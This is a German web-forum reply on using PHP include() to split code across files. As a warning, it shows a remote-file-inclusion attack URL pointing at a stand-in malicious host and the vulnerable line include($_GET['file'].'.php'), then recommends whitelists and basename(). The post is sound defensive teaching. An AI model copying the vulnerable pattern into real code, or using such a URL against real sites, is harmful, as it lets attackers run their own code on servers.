nicht angemeldet
Hallo!
also es sind mehrere unterschidliche dateien. in einer steht z.B.
$user = "ich";
$host = "mein MySQL host";
$pwd = "mein MySQL pwd";
>
> in einer weiteren stehen funktionen
>
> ~~~php
> function zaehle($von, $bis)
> {
> while($von <= $bis)
> {
> echo "$von<br>";
> $von++;
> }
> return true;
> }
>
OK, dann brauchst Du also include(), wenn Du PHP-Code ausführen willst. Allerdings würde ich solche Dateien lieber außerhalb des doc-root speichern. Bedenke bei include(), dass es nicht möglich sein darf, dass Dir jemand einen Parameter übergeben kann, so dass er eigenen Code einbinden kann:
/script.php?file=http://boese.de/BOESES_SCRIPT
include($_GET['file'].'.php');
z.B. (also sowas NICHT machen, nicht dass da irgendwelche Zweifel aufkommen ;-))
Am besten keine Vaiablen verwenden, und wenn doch, nur welche die 100%ig geprüft sind, z.B. über eine Whitelist. Und ein basename() ist meistens auch nicht verkehrt.
Grüße
Andreas
SELFHTML Tipps & Tricks: http://aktuell.de.selfhtml.org/tippstricks/